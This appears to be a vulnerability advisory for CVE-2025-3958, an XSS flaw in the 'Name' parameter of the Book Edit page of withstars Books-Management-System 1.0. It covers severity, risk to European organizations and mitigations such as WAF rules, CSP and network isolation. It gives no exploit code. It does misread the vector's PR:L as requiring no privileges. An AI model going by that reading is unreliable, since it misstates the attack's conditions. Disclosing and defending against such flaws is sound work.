CVE-2025-3958 is a cross-site scripting (XSS) vulnerability identified in version 1.0 of the withstars Books-Management-System, specifically within the Book Edit Page component (/book_edit_do.html). The vulnerability arises from improper sanitization or validation of the 'Name' parameter, allowing an attacker to inject malicious scripts that execute in the context of the victim's browser. This flaw can be exploited remotely without authentication, requiring only user interaction to trigger the malicious payload. The vulnerability is classified as 'problematic' and may also affect other parameters beyond 'Name'. Importantly, the affected product version is no longer supported by the vendor, meaning no official patches or updates are available to remediate this issue. The CVSS v4.0 base score is 5.1, indicating a medium severity level. The vector string (AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N) shows that the attack is network-based, requires low attack complexity, no attacker privileges, no authentication, but does require user interaction. The vulnerability impacts the integrity and confidentiality of user data by potentially allowing session hijacking, credential theft, or unauthorized actions performed via the victim's browser. Although no known exploits are currently observed in the wild, the public disclosure of the exploit code increases the risk of exploitation, especially given the lack of vendor support and patches. The vulnerability does not affect system availability directly and does not involve scope or security requirement changes.

For European organizations using withstars Books-Management-System 1.0, this vulnerability poses a moderate risk primarily to the confidentiality and integrity of user data. Attackers could exploit the XSS flaw to steal session cookies, perform actions on behalf of legitimate users, or deliver further malware payloads. This is particularly concerning for organizations managing sensitive or proprietary information within the Books-Management-System, such as academic institutions, libraries, or publishing houses. The lack of vendor support means organizations cannot rely on official patches, increasing exposure duration. Additionally, if the system is integrated with other internal services or single sign-on mechanisms, the impact could extend beyond the Books-Management-System itself. The requirement for user interaction (e.g., clicking a malicious link) limits the attack vector but does not eliminate risk, especially in environments where phishing or social engineering attacks are common. The medium severity indicates that while the threat is not critical, it should not be ignored, especially in sectors with strict data protection regulations like GDPR. Failure to mitigate could lead to data breaches, reputational damage, and potential regulatory penalties.

Since the product is no longer supported and no official patches exist, organizations should consider immediate replacement or upgrade to a supported alternative Books-Management-System. Implement web application firewalls (WAF) with custom rules to detect and block malicious payloads targeting the vulnerable parameter 'Name' and other input fields on /book_edit_do.html. Apply input validation and output encoding at the proxy or gateway level if possible, sanitizing user inputs before they reach the application. Conduct user awareness training focused on phishing and social engineering to reduce the likelihood of users interacting with malicious links. Isolate the vulnerable system within a segmented network zone with strict access controls to limit exposure. Monitor logs and network traffic for unusual activity related to the Books-Management-System, especially HTTP requests containing suspicious scripts or payloads. If feasible, deploy Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts within the application context. Regularly review and audit all web-facing applications for similar vulnerabilities, prioritizing unsupported or legacy software.